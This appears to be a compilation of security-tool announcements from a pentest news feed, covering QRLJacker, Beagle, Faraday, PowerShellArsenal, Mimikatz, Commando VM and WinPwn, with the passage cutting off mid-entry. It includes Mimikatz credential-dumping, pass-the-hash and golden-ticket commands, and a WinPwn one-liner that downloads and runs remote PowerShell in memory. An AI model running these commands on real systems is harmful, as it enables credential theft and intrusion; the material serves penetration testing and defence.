QRLJacker v2.0 – QRLJacking Exploitation Framework

QRLJacker is a highly customizable exploitation framework to demonstrate “QRLJacking Attack Vector" to show how it is easy to hijack services that depend on the QR Code as an authentication and login method, Mainly it aims to raise security awareness regarding all the services using the QR Code as the main way to login users to different services!Prerequisites before installing:Linux or MacOS. (Not working on windows)Python 3.7+Installing instructions:Update Firefox browser to the latest versionInstall the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file then do :chmod +x geckodriversudo mv -f geckodriver /usr/local/share/geckodriversudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriversudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriverClone the repo with git clone https://github.com/OWASP/QRLJacking then do cd QRLJacking/QRLJackerInstall all the requirements with pip install -r requirements.txtNow you can run the framework with python3 QrlJacker.py –helpTested onUbuntu 18.04 Bionic BeaverKali Linux 2018.x and upUsageCommandline argumentsusage: QrlJacker.py [-h] [-r ] [-x ] [–debug] [–dev] [–verbose] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). –debug Enables debug mode (Identifying problems easier). –dev Enables development mode (Reloading modules every use). –verbose Enables verbose mode (Display more details). -q Quit mode (no banner).Main menu helpGeneral commands================= Command Description ——— ————- help/? Show this help menu. os Execute a system command without closing the framework banner Display banner. exit/quit Exit the framework.Core commands============= Command Description ——— ————- database Prints the core version and then check if it’s up-to-date. debug Drop into debug mode or disable it. (Making identifying problems easier) dev Drop into development mode or disable it. (Reload modules every use) verbose Drop into verbose mode or disable it. (Make framework displays more details) reload/refresh Reload the modules database.Resources commands================== Command Description ——— ————- history Display commandline most important history from the beginning. makerc Save the most important commands entered since start to a file. resource <file> Run the commands stored in a file.Sessions management commands============================ Command Description ——— ————- sessions (-h) Dump session listings and display information about sessions. jobs (-h) Displays and manages jobs.Module commands=============== Command Description ——— ————- list/show List modules you can use. use <module> Use an available module. info <module> Get information about an available module. previous Runs the previously loaded module. search <text> Search for a module by a specific text in its name or in its description.Module menu helpGeneral commands================= Command Description ——— ————- help/? Show this help menu. os <command> Execute a system command without closing the framework banner Display banner. exit/quit Exit the framework.Core commands============= Command Description ——— ————- database Prints the core version and then check if it’s up-to-date. debug Drop into debug mode or disable it. (Making identifying problems easier) dev Drop into development mode or disable it. (Reload modules every use) verbose Drop into verbose mode or disable it. (Make framework displays more details) reload/refresh Reload the modules database.Resources commands================== Command Description ——— ————- history Display commandline most important history from the beginning. makerc Save the most important commands entered since start to a file. resource <file> Run the commands stored in a file.Sessions management commands============================ Command Description ——— ————- sessions (-h) Dump session listings and display information about sessions. jobs (-h) Displays and manages jobs.Module commands=============== Command Description ———- ————– list/show List modules you can use. options Displays options for the current module. set Sets a context-specific variable to a value. run Launch the current module. use <module> Use an available module. info <module> Get information about an available module. search <text> Search for a module by a specific text in its name or in its description. previous Sets the previously loaded module as the current module. back Move back from the current context.Sessions command help menuusage: sessions [-h] [-l] [-K] [-s] [-k] [-i]optional arguments: -h Show this help message. -l List all captured sessions. -K Remove all captured sessions. -s Search for sessions with a specifed type. -k Remove a specifed captured session by ID -i Interact with a captured session by ID.Jobs command help menuusage: jobs [-h] [-l] [-K] [-k]optional arguments: -h Show this help message. -l List all running jobs. -K Terminate all running jobs. -k Terminate jobs by job ID or module nameTaking advantage of the coreCommands autocompleteThe autocomplete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:It’s designed to fix typos in typed commands to the most similar command with just one tab click so saerch becomes search and so on, even if you typed any random word similar to an command in this framework. For you lazy-ones out there like me, it can predict what module you are trying to use by typing any part of it. For example if you typed use wh and clicked tab, it would be replaced with use grabber/whatsapp and so on. I can see your smile, You are welcome! If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted. Some less impressive things like autocomplete for options of the current module after set command, autocomplete for modules after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing. Finally, you’ll find the normal autocompletion things you were using before, like commands autocompletion and persistent history, etc… AutomationAs you may noticed, you can use a resource file from command-line arguments before starting the framework itself or send commands directly.Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.There are history and resource commands so you don’t need to exit the framework.You can execute as many commands as you want at the same time by splitting them with semi-colon and many more left to be discovered by yourself.Searching for modules in QRLJacker is so easy, you can search for a module by its name, something written in its description or even the author name.OWASP’s links referencehttps://www.owasp.org/index.php/QRLJackinghttps://www.owasp.org/index.php/OWASP_QRLJackerDownload QRLJacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/juZIlVyrDiM/qrljacker-v20-qrljacking-exploitation.html

[python]Disabling and enabling Windows proxy settings

References: https://superuser.com/questions/1113796/how-to-run-a-python-script-with-cmd-exe-and-make-it-invisible/1113801 https://stackoverflow.com/questions/31348111/setting-proxy-settings-in-windows-with-python-using-internetsetoption Requirements Disable and enable the proxy without closing internet explorer. Enable the proxy setting when auto configuration url (PAC location) is not available. Trigger the script to disable proxy when your laptop is connected out of office. Trigger the script to enable the proxy when your laptop is connected to your domain … Continue reading [python]Disabling and enabling Windows proxy settings

Link: http://cyruslab.net/2019/04/09/pythondisabling-and-enabling-windows-proxy-settings/

Free Cynet Threat Assessment for Mid-sized and Large Organizations

If you cannot see what’s happening in your network, your ability to make smart security decisions will suffer. Many vendors offer threat assessment options, but they usually require an investment of time and resources. One vendor out there – Cynet – is offering a no-cost threat assessment to qualifying organizations for a limited time only. Based on more than 72-hours of data collection, the assessment gives organizations the ability to benchmark their security posture against their industry peers and provides actionable insights.How do you qualify? If your organization has at least 300 endpoints, you can take advantage of this free offer, to find out what your exposed attack surfaces are and understand what you can do to respond to attacks currently active in your environment. The assessment includes:Live attack indicators such as malware, C&C connections, data exfiltration, phishing link access, user credential thefts attempts, etc.Attack surfaces on host and application surfaces: unpatched vulnerabilities risk ranked  Benchmark of your security posture in comparison to your industry peers:Risk score based on total findings.User identity attack surface: risk ranking of user accounts.Security decision makers can take advantage of this offer to achieve (with no-obligation) full visibility into their actual security posture, highlighting what their needs are and providing a clear picture of risk ranking into threats and vulnerabilities. Given that most threat assessments for mid-sized organizations begin at $25-thousand, and considering what the Cynet assessment provides, this is a very attractive offer for the security-conscious organization.   Cynet has heavily focused efforts into research in the threat landscape, especially among its install base, and over the last few months has seen a clear increase in live attacks during new deployments.  Said Cynet CEO and co-founder Eyal Gruner, “We frequently discover live malicious activity in the networks of organizations when we do initial deployment of the Cynet platform. One of our first tasks upon deploying  is to identify and remediate these risks.”It is important to note that organizations are almost always unaware of the malicious activity, and additionally, most do not understand the capacity of the attacker’s ability to maneuver in stealth mode. This leaves a large gap between what many organizations think is going on in their networks and the actual threat reality, providing them with a false sense of security. With this in mind, the Cynet solution provides a proactive approach to threat assessment and response. Said Gruner, “We decided to offer this threat assessment to organizations, whether they are Cynet customers or not. We believe that instead of waiting for product deployments, organizations will get more benefit by addressing the issues we typically encounter, up-front and before deploying full-scale.”  Educating organizations in cyber security best practices is part of Cynet’s mission. Said Gruner, “We want people to realize that the risks are there, even when you don’t see them. Security has to be more than just buying a product to say you have it. You need visibility, and results with clear, actionable deductions. At Cynet, we want to help organizations achieve this.”Try Cynet’s Free Threat Assessment here.

Link: http://feedproxy.google.com/~r/PentestTools/~3/nSnlxp2L5PU/free-cynet-threat-assessment-for-mid.html

Beagle – An Incident Response And Digital Forensics Tool Which Transforms Security Logs And Data Into Graphs

Beagle is an incident response and digital forensics tool which transforms data sources and logs into graphs. Supported data sources include FireEye HX Triages, Windows EVTX files, SysMon logs and Raw Windows memory images. The resulting Graphs can be sent to graph databases such as Neo4J or DGraph, or they can be kept locally as Python NetworkX objects.Beagle can be used directly as a python library, or through a provided web interface.The library can be used either as a sequence of functional calls.>>> from beagle.datasources import SysmonEVTX>>> graph = SysmonEVTX(“malicious.evtx").to_graph()>>> graphOr by strictly calling each intermediate step of the data source to graph process.>>> from beagle.backends import NetworkX>>> from beagle.datasources import SysmonEVTX>>> from beagle.transformers import SysmonTransformer>>> datasource = SysmonEVTX("malicious.evtx")# Transformers take a datasource, and transform each event# into a tuple of one or more nodes.>>> transformer = SysmonTransformer(datasource=datasource)>>> nodes = transformer.run()# Transformers output an array of nodes.[ (<SysMonProc> process_guid="{0ad3e319-0c16-59c8-0000-0010d47d0000}"), (<File> host="DESKTOP-2C3IQHO" full_path="C:\Windows\System32\services.exe"), …]# Backends take the nodes, and transform them into graphs>>> backend = NetworkX(nodes=nodes)>>> G = backend.graph()<networkx.classes.multidigraph.MultiDiGraph at 0x126b887f0>Graphs are centered around the activity of individual processes, and are meant primarily to help analysts investigate activity on hosts, not between them.InstallationDockerBeagle is available as a docker file:docker pull yampelo/beaglemkdir -p data/beagledocker run -v "$PWD/data/beagle":"/data/beagle" -p 8000:8000 yampelo/beaglePython PackageIt is also available as library. Full API Documentation is available on https://beagle-graphs.readthedocs.iopip install pybeagleConfigurationComplete overview of each configuration entryAny entry in the configuration file can be modified using environment variables that follow the following format; BEAGLE__{SECTION}__{KEY}. For example, in order to change the VirusTotal API Key used when using the docker image, you would use -e parameter and set the BEAGLE__VIRUSTOTAL__API_KEY variable:docker run -v "data/beagle":"/data/beagle" -p 8000:8000 -e "BEAGLE__VIRUSTOTAL__API_KEY=$API_KEY" beagleEnvironment variables and directories can be easily defined using docker composeversion: "3" services: beagle: image: yampelo/beagle volumes: – /data/beagle:/data/beagle ports: – "8000:8000" environment: – BEAGLE__VIRUSTOTAL__API_KEY=$key$ Web InterfaceBeagle’s docker image comes with a web interface that wraps around the process of both transforming data into graphs, as well as using them to investigate data.Uploading DataThe upload form wraps around the graph creation process, and automatically uses NetworkX as the backend. Depending on the parameters required by the data source, the form will either prompt for a file upload, or text input. For example:VT API Sandbox Report asks for the hash to graph.FireEye HX requires the HX triage.Any graph created is stored locally in the folder defined under the dir key from the storage section in the configuration. This can be modified by setting the BEAGLE__STORAGE__DIR enviroment variable.Optionally, a comment can be added to any graph to better help describe it.Each data source will automatically extract metadata from the provided parameter. The metadata and comment are visible later on when viewing the existing graphs of the datasource.Browsing Existing GraphsClicking on a datasource on the sidebar renders a table of all parsed graphs for that datasource.Graph InterfaceViewing a graph in Beagle provides a web interface that allows analysts to quickly pivot around an incident.The interface is split into two main parts, the left part which contains various perspectives of the graph (Graph, Tree, Table, etc), and the right part which allows you to filter nodes and edges by type, search for nodes, and expand a nodes properties. It also allows you to undo and redo operations you perform on the graph.Any element in the graph that has a divider above it is collapsible:Inspecting Nodes and EdgesNodes in the graph display the first 15 characters of their a specific field. For example, for a process node, this will be the process name.Edges simply show the edge type.A single click on a node or edge will focus that node and display its information in the "Node Info" panel on the right sidebar.Focusing on a NodeFocusing on an EdgeExpanding NeighboursA double click on a node will pull in any neighbouring nodes. A neighbouring node is any node connected to the clicked on node by an edge. If there are no neighbors to be pulled in, no change will be seen in the graph.This is regardless of direction. That means that a parent process or a child process could be pulled in when double clicking on a node.Beagle will only pull in 25 nodes at a time.Hiding NodesA long single click on a node will hide it from the graph, as well as any edges that depend on it.Running MutatorsRight clicking on a node exposes a context menu that allows you to run graph mutators. Mutators are functions which take the graph state, and return a new state.Two extremely useful mutators are:Backtracking a node: Find the sequence of nodes and edges that led to the creation of this node.Backtracking a process node will show its process tree.Expanding all descendants: From the current node, show every node that has this node as an ancestor.Expanding a process node will show every child process node it spawned, any file it may have touched, and pretty much every activity that happened as a result of this node.Backtracking a nodeBacktracking a node is extremely useful, and is similar to doing a root cause infection in log files.Expanding Node DescendantsExpanding a node’s descendants allows you to immediately view everything that happened because of this node. This action reveals the subgraph rooted at the selected node.Toggling Node and Edge TypesSometimes, a Node or Edge might not be relevant to the current incident, you can toggle edge and node types on and off. As soon as the type is toggled, the nodes or edges of that type are removed from the visible graph.Toggling a node type off prevents that node type to be used when using mutators, or when pulling in neighbours.Undo/Redo Action and ResetAny action in the graph is immediately reversable! Using the undo/redo buttons you can revert any action you perform. The reset button sets the graph state to when it loaded, saving you a refresh.Graph PerspectivesAs you change the graphs current state using the above action, you might also want to view the current set of visible node and edges in a different perspective. The tabs at the top of the graph screen allow you to transform the data into a variety of views:Graph (Default perspective)TreeTableTimelineMarkdownEach of the perspectives supports focusing on nodes by clicking on them.Python LibraryThe graph generation process can be performed programatically using the python library. The graph generation process is made up of three steps:DataSource classes parse and yield events one by one.Transformer classes take those inputs, and transform them into various Node classes such as Process.Backend classes take the array of nodes, place them into a graph structure, and send them to a desired location.The Python package can be installed via pip:version: "3"services: beagle: image: yampelo/beagle volumes: – /data/beagle:/data/beagle ports: – "8000:8000" environment: – BEAGLE__VIRUSTOTAL__API_KEY=$key$Creating a graph requires chaining these together. This can be done for you using the to_graph() function.pip install pybeagleIt can also be done explicitly at each step. Using the functional calls, you can also define which Backend you wish to use for example, to send data to DGraphfrom beagle.datasources import HXTriage# By default, using the to_graph() class uses NetworkX and the first transformer.G = HXTriage(‘test.mans’).to_graph()<networkx.classes.multidigraph.MultiDiGraph at 0x12700ee10>When calling the to_graph or to_transformer methods, you can pass in any arguments to those classes:from beagle.datasources import HXTriagefrom beagle.backends import DGraphfrom beagle.transformers import FireEyeHXTransformer# The data will be sent to the DGraph instance configured in the# configuration filebackend = HXTriage(‘test.mans’).to_graph(backend=DGraph)# Can also specify the transformerbackend = HXTriage(‘test.mans’).to_transformer(transformer=FireEyeHXTransformer).to_graph(backend=DGraph)You can also manually invoke each step in the above process, accessing the intermediary outputsfrom beagle.datasources import HXTriagefrom beagle.backends import Graphistry# Send the graphistry, anonymize the data first, and return the URLgraphistry_url = HXTriage(‘test.mans’).to_graph(backend=Graphistry, anonymize=True, render=False)If you want to manually call each step, you will need to ensure that the Transformer class instance is compatible with the output of the provided DataSource class.All Backends are compatible with all Transformers.Each data source defines the list of transformers it is compatible with, and this can be accessed via the .transformers attribute:>>> from beagle.backends import NetworkX>>> from beagle.datasources import HXTriage>>> from beagle.transformers import FireEyeHXTransformer>>> datasource = HXTriage("test.mans")>>> transformer = FireEyeHXTransformer(datasource=datasource)>>> nodes = transformer.run()>>> backend = NetworkX(nodes=nodes)>>> G = backend.graph()Controlling Edge GenerationBy default, edges are not condensed, that means that if a process node u writes to a file node v 5000 times, you will have 5000 edges between those nodes. Sometimes, especially when trying to visualize the data, this may overwhelm an analyst.You can condense all 5000 edges into a single edge for that type of action (wrote in this case), by passing the backend class the consolidate_edges=True parameter, for example:>>> from beagle.datasources import HXTriage>>> HXTriage.transformers[beagle.transformers.fireeye_hx_transformer.FireEyeHXTransformer]By default, the web interface will consolidate the edges.DocumentationREST API OverviewConfigurationDevelopementDesign LogicDownload Beagle

Link: http://www.kitploit.com/2019/04/beagle-incident-response-and-digital.html

Faraday v3.7 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.7: Now, you can include images to explain vulnerability steps, add tables, codes, and we also support:TitleBold and italic typographyClick here to find out how to configure Markdown in Faraday: New vuln previewWith Faraday v3.7 you don’t have to click “edit” to view your vuln. Just click on it and you will see all the information you need. This improvement allows you to have an easy preview of all the vulns in the status report. Refine your searches for better automationWas included custom fields on Searcher, helping you find and act upon all the elements you need faster. With this new function, you can search vulns by different kinds of information relevant for you.Download Faraday v3.7

Link: http://feedproxy.google.com/~r/PentestTools/~3/oLcdNOwS8pg/faraday-v37-collaborative-penetration.html

PowerShellArsenal – A PowerShell Module Dedicated To Reverse Engineering

PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc. PowerShellArsenal is comprised of the following tools:DisassemblyDisassemble native and managed code.Get-CSDisassemblyDisassembles a byte array using the Capstone Engine disassembly framework.Get-ILDisassemblyDisassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm.MalwareAnalysisUseful tools when performing malware analysis.New-FunctionDelegateProvides an executable wrapper for an X86 or X86_64 function.Invoke-LoadLibraryLoads a DLL into the current PowerShell process.New-DllExportFunctionCreates an executable wrapper delegate around an unmanaged, exported function.Get-HostsFileParses a HOSTS file.New-HostsFileEntryReplace or append an entry to a HOSTS file.Remove-HostsFileEntryRemove an entry or series of entries from a HOSTS file.Get-AssemblyStringsOutput all strings from a .NET executable.Get-AssemblyResourcesExtract managed resources from a .NET assemblyRemove-AssemblySuppressIldasmAttributeStrips a SuppressIldasmAttribute attribute from a .NET assembly.Get-AssemblyImplementedMethodsReturns all methods in an assembly that are implemented in MSIL.MemoryToolsInspect and analyze process memoryGet-ProcessStringsOutputs all printable strings from the user-mode memory of a process.Get-VirtualMemoryInfoA wrapper for kernel32!VirtualQueryExGet-ProcessMemoryInfoRetrieve virtual memory information for every unique set of pages in user memory. This function is similar to the !vadump WinDbg command.Get-StructFromMemoryMarshals data from an unmanaged block of memory in an arbitrary process to a newly allocated managed object of the specified type.ParsersParse file formats and in-memory structures.Get-PEAn on-disk and in-memory PE parser and process dumper.Find-ProcessPEsFinds portable executables in memory regardless of whether or not they were loaded in a legitimate fashion.Get-LibSymbolsDisplays symbolic information from Windows LIB files.Get-ObjDumpDisplays information about Windows object (OBJ) files.WindowsInternalsObtain and analyze low-level Windows OS information.Get-NtSystemInformationA utility that calls and parses the output of the ntdll!NtQuerySystemInformation function. This utility can be used to query internal OS information that is typically not made visible to a user.Get-PEBReturns the process environment block (PEB) of a process.Register-ProcessModuleTraceStarts a trace of loaded process modulesGet-ProcessModuleTraceDisplays the process modules that have been loaded since the call to Register-ProcessModuleTraceUnregister-ProcessModuleTraceStops the running process module traceGet-SystemInfoA wrapper for kernel32!GetSystemInfoMiscMiscellaneous helper functionsGet-MemberA proxy function used to extend the built-in Get-Member cmdlet. It adds the ‘-Private’ parameter allowing you to display non-public .NET membersGet-StringsDumps strings from files in both Unicode and Ascii. This cmdlet replicates the functionality of strings.exe from Sysinternals.ConvertTo-StringConverts the bytes of a file to a string that has a 1-to-1 mapping back to the file’s original bytes. ConvertTo-String is useful for performing binary regular expressions.Get-EntropyCalculates the entropy of a file or byte array.LibLibraries required by some of the RE functions.CapstoneThe Capstone disassembly engine C# binding.De4dotA powerful .NET deobfuscation and .NET PE parsing library.PSReflectA module used to easily define in-memory enums, structs, and Win32 functions.Formattersps1xml files used to format the output of various PowerShellArsenal functions.LicenseThe PowerShellArsenal module and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.UsageRefer to the comment-based help in each individual script for detailed usage information.To install this module, drop the entire PowerShellArsenal folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.The default per-user module path is: “$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"To use the module, type Import-Module PowerShellArsenalTo see the commands imported, type Get-Command -Module PowerShellArsenalIf you’re running PowerShell v3 and you want to remove the annoying ‘Do you really want to run scripts downloaded from the Internet’ warning, once you’ve placed PowerShellArsenal into your module path, run the following one-liner: $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerShellArsenal) ) {Get-ChildItem $_ -Recurse | Unblock-File} }For help on each individual command, Get-Help is your friend.Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.Script Style GuideFor all contributors and future contributors to PowerShellArsenal, I ask that you follow this style guide when writing your scripts/modules.Avoid Write-Host at all costs. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspxhttp://technet.microsoft.com/en-us/library/ff730946.aspxIf you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on ‘-Verbose’. Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. I prefer that variable names be capitalized and be as descriptive as possible. Provide logical spacing in between your code. Indent your code to make it more readable. If you find yourself repeating code, write a function. Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use ‘Throw’. If you have an error that doesn’t need to stop execution, use Write-Error. If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. PowerShell v2 compatibility is highly desired. Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I’m looking for something like the following: [Parameter(Position = 0, Mandatory = $True)]Don’t use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. Don’t go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. Explicitly state all required and optional dependencies in the comment-based help for your function. All library dependencies should reside in the ‘Lib’ folder. If a script creates complex custom objects, include a ps1xml file that will properly format the object’s output. ps1xml files are stored in Lib\Formatters. Download PowerShellArsenal

Link: http://www.kitploit.com/2019/04/powershellarsenal-powershell-module.html

Mimikatz v2.2.0 – A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.But that’s not all! Crypto, Terminal Server, Events, … lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).If you don’t want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releasesQuick usagelogprivilege::debugsekurlsasekurlsa::logonpasswordssekurlsa::tickets /exportsekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmdkerberoskerberos::list /exportkerberos::ptt c:\chocolate.kirbikerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbicryptocrypto::capicrypto::cngcrypto::certificates /exportcrypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINEcrypto::keys /exportcrypto::keys /machine /exportvault & lsadumpvault::credvault::listtoken::elevatevault::credvault::listlsadump::samlsadump::secretslsadump::cachetoken::revertlsadump::dcsync /user:domain\krbtgt /domain:lab.localBuildmimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)Synchronize!GIT URL is : https://github.com/gentilkiwi/mimikatz.gitSVN URL is : https://github.com/gentilkiwi/mimikatz/trunkZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zipBuild the solutionAfter opening the solution, Build / Build Solution (you can change architecture)mimikatz is now built and ready to be used! (Win32 / x64)you can have error MSB3073 about _build_.cmd and mimidrv, it’s because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.ddk2003With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.Follow instructions:http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systemehttp://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheaderLicenceCC BY 4.0 licence – https://creativecommons.org/licenses/by/4.0/mimikatz needs coffee to be developed:ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5PayPal: https://www.paypal.me/delpy/AuthorBenjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )DCSync function in lsadump module was co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )This is a personal development, please respect its philosophy and don’t use it for bad things!Download Mimikatz

Link: http://www.kitploit.com/2019/04/mimikatz-v220-post-exploitation-tool-to.html

Commando VM – The First of Its Kind Windows Offensive Distribution

Welcome to CommandoVM – a fully customized, Windows-based security distribution for penetration testing and red teaming.Installation (Install Script)RequirementsWindows 7 Service Pack 1 or Windows 1060 GB Hard Drive2 GB RAMInstructionsCreate and configure a new Windows Virtual MachineEnsure VM is updated completely. You may have to check for updates, reboot, and check again until no more remainTake a snapshot of your machine!Download and copy install.ps1 on your newly configured machine.Open PowerShell as an AdministratorEnable script execution by running the following command:Set-ExecutionPolicy UnrestrictedFinally, execute the installer script as follows:.\install.ps1You can also pass your password as an argument: .\install.ps1 -password The script will set up the Boxstarter environment and proceed to download and install the Commando VM environment. You will be prompted for the administrator password in order to automate host restarts during installation. If you do not have a password set, hitting enter when prompted will also work.Installing a new packageCommando VM uses the Chocolatey Windows package manager. It is easy to install a new package. For example, enter the following command as Administrator to deploy Github Desktop on your system:cinst githubStaying up to dateType the following command to update all of the packages to the most recent version:cup allInstalled ToolsActive Directory ToolsRemote Server Administration Tools (RSAT)SQL Server Command Line UtilitiesSysinternalsCommand & ControlCovenantPoshC2WMImplantWMIOpsDeveloper ToolsDepGitGoJavaPython 2Python 3 (default)Visual Studio 2017 Build Tools (Windows 10)Visual Studio CodeEvasionCheckPleaseDemiguiseDotNetToJScriptInvoke-CradleCrafterInvoke-DOSfuscationInvoke-ObfuscationInvoke-Phant0mNot PowerShell (nps)PS>AttackPSAmsiPafishmacroPowerLessShellPowerShdllStarFightersExploitationADAPE-ScriptAPI MonitorCrackMapExecCrackMapExecWinDAMPExchange-AD-PrivescFuzzySec’s PowerShell-SuiteFuzzySec’s Sharp-SuiteGenerate-MacroGhostPackRubeusSafetyKatzSeatbeltSharpDPAPISharpDumpSharpRoastSharpUpSharpWMIGoFetchImpacketInvoke-ACLPwnInvoke-DCOMInvoke-PSImageInvoke-PowerThIEfKali Binaries for WindowsLuckyStrikeMetaTwinMetasploitMr. Unikod3r’s RedTeamPowershellScriptsNetshHelperBeaconNishangOrcaPSReflectPowerLurkPowerPrivPowerSploitPowerUpSQLPrivExchangeRulerSharpExchangePrivSpoolSampleUACMEimpacket-examples-windowsvssownInformation GatheringADACLScannerADExplorerADOfflineADReconBloodHoundGet-ReconInfoGoWitnessNmapPowerViewDev branch includedSharpHoundSharpViewSpoolerScannerNetworking ToolsCitrix ReceiverOpenVPNProxycapPuTTYTelnetVMWare Horizon ClientVMWare vSphere ClientVNC-ViewerWinSCPWindumpWiresharkPassword AttacksASREPRoastCredNinjaDSInternalsGet-LAPSPasswordsHashcatInternal-MonologueInveighInvoke-TheHashKeeFarceKeeThiefLAPSToolkitMailSniperMimikatzMimikittenzRiskySPNSessionGopherReverse EngineeringDNSpyFlare-FlossILSpyPEviewWindbgx64dbgUtilities7zipAdobe ReaderAutoITCmderCyberChefGimpGreenshotHashcheckHexchatHxDKeepassMobaXtermMozilla ThunderbirdNeo4j Community EditionPidginProcess Hacker 2SQLite DB BrowserScreentogifShellcode LauncherSublime Text 3TortoiseSVNVLC Media PlayerWinraryEd Graph ToolVulnerability AnalysisEgress-AssessGrouper2zBangWeb ApplicationsBurp SuiteFiddlerFirefoxOWASP ZapWordlistsFuzzDBPayloadsAllTheThingsSecListsDownload Commando-Vm

Link: http://feedproxy.google.com/~r/PentestTools/~3/7vdMiUOLgeU/commando-vm-first-of-its-kind-windows.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!Just Import the Modules with “Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1’)Functions available after Import: WinPwn -> Guides the user through all functions/Modules with simple questions. Inveigh -> Executes Inveigh in a new Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with Session management afterwards sessionGopher -> Executes Sessiongopher and Asking for parameters (https://github.com/Arvanaghi/SessionGopher) Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit) localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS) JAWS -> Just another Windows Privilege Escalation script gets executed domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, 